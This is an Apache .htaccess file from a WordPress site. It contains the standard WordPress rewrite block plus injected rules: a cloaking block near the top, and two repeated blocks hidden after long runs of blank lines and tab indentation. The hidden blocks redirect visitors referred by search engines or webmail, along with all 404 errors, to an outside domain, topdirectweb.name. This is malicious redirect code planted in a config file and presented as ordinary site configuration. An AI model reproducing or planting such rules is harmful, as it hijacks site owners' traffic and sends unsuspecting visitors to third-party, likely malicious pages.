<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{HTTP_USER_AGENT} (google|yahoo|msn|aol|bing) [OR]
RewriteCond %{HTTP_REFERER} (google|yahoo|msn|aol|bing)
RewriteRule ^.*$ index.php [L]
</IfModule>





# BEGIN WordPress
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>
 
# END WordPress

































































																																																	ErrorDocument 404 http://topdirectweb.name/
																																																	<IfModule mod_rewrite.c>
																																																	RewriteEngine On
																																																	RewriteCond %{HTTP_REFERER} (google|yahoo|msn|aol|bing|mail|inbox|comcast)
																																																        RewriteRule ^.*$ http://topdirectweb.name/ [L]
																																																	</IfModule>


































































																																																	ErrorDocument 404 http://topdirectweb.name/
																																																	<IfModule mod_rewrite.c>
																																																	RewriteEngine On
																																																	RewriteCond %{HTTP_REFERER} (google|yahoo|msn|aol|bing|mail|inbox|comcast)
																																																        RewriteRule ^.*$ http://topdirectweb.name/ [L]
																																																	</IfModule>
